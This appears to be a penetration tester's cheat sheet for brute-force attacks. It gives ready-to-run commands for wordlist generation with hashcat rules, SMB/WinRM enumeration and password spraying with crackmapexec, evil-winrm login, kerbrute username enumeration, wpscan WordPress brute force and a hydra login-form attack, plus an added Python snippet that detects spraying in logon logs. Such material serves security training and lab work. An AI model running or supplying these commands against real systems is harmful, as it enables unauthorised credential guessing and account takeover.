Brute Force
Generate Wordlist
Password possibilities:
username
summer, spring, winter
password
date (july, april, 2023, etc.)
Using Hashcat
hashcat --force --stdout -r /usr/share/hashcat/rules/best64.rule password.lst
Active Directory
Check workstations
crackmapexec smb 192.168.1.0/24
crackmapexec winrm 192.168.1.0/24
# have a user and password?
# go enumerate computers in the domain
crackmapexec smb $IP -u <username> -p <password> --computers
Password spraying
check the password policy
crackmapexec smb $IP --pass-pol
# Check the output: if it contains a line like the following, go ahead with brute force.
Account Lockout Threshold: None
Prepare targets.txt, users.txt and passwords.txt
crackmapexec winrm targets.txt -u users.txt -p passwords.txt --continue-on-success -d <domain>
crackmapexec smb $IP -u users.txt -p '<password>'
crackmapexec winrm $IP -u users.txt -p '<password>'
# --> use evil-winrm to login
# example: evil-winrm -u mhope -p 'testpassword' -i $IP
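From the defending side, the spraying pattern above (one source, many accounts, few guesses each) shows up in failed-logon data even when no lockout threshold is set. The following Python is an added example, not part of the original notes; the log format, the `detect` function and its thresholds are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real logs): time, source, account, outcome.
# On Windows the equivalent data comes from failed-logon events (Event ID 4625).
SAMPLE_LOG = """\
2023-04-01T09:00:01 10.0.0.5 alice FAIL
2023-04-01T09:00:02 10.0.0.5 bob FAIL
2023-04-01T09:00:03 10.0.0.5 carol FAIL
2023-04-01T09:00:04 10.0.0.5 dave FAIL
2023-04-01T09:00:05 10.0.0.5 erin OK
2023-04-01T09:10:00 10.0.0.9 alice FAIL
2023-04-01T09:10:01 10.0.0.9 alice FAIL
2023-04-01T09:10:02 10.0.0.9 alice FAIL
2023-04-01T09:10:03 10.0.0.9 alice FAIL
2023-04-01T09:10:04 10.0.0.9 alice FAIL
2023-04-01T10:00:00 10.0.0.7 frank FAIL
2023-04-01T13:00:00 10.0.0.7 grace FAIL
"""

def parse(log):
    """Yield (time, source, account, outcome) tuples from the assumed format."""
    for line in log.splitlines():
        ts, src, user, outcome = line.split()
        yield datetime.fromisoformat(ts), src, user.lower(), outcome

def detect(log, window=timedelta(minutes=5), spray_users=4, brute_fails=5):
    """Return {source: set of labels} for sources exceeding either threshold."""
    fails = defaultdict(list)   # source -> [(time, account)] failures in window
    alerts = defaultdict(set)
    for ts, src, user, outcome in sorted(parse(log)):
        if outcome != "FAIL":
            continue
        recent = [(t, u) for t, u in fails[src] if ts - t <= window] + [(ts, user)]
        fails[src] = recent
        per_user = defaultdict(int)
        for _, u in recent:
            per_user[u] += 1
        # Spray: many distinct accounts, each tried rarely (stays under lockout).
        if len(per_user) >= spray_users:
            alerts[src].add("spray")
        # Brute force: one account hit repeatedly; a lockout threshold stops this.
        if max(per_user.values()) >= brute_fails:
            alerts[src].add("bruteforce")
    return dict(alerts)

if __name__ == "__main__":
    for src, labels in detect(SAMPLE_LOG).items():
        print(src, sorted(labels))
```

The per-account lockout threshold only covers the second label; the first needs a per-source count like this one, because each account sees too few failures to trip a lockout.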
Kerbrute
kerbrute userenum --dc <dc ip> -d <domain> users.txt
kerbrute userenum --dc <dc ip> -d <domain> /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt
# kerbrute with NTLM hash (https://github.com/3gstudent/pyKerbrute)
WordPress Login
wpscan --url <wordpress url> --wordlist /usr/share/wordlists/rockyou.txt --username <username>
Website Login Brute Force
hydra -l '' -P 3digits.txt -f -v 10.10.171.8 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000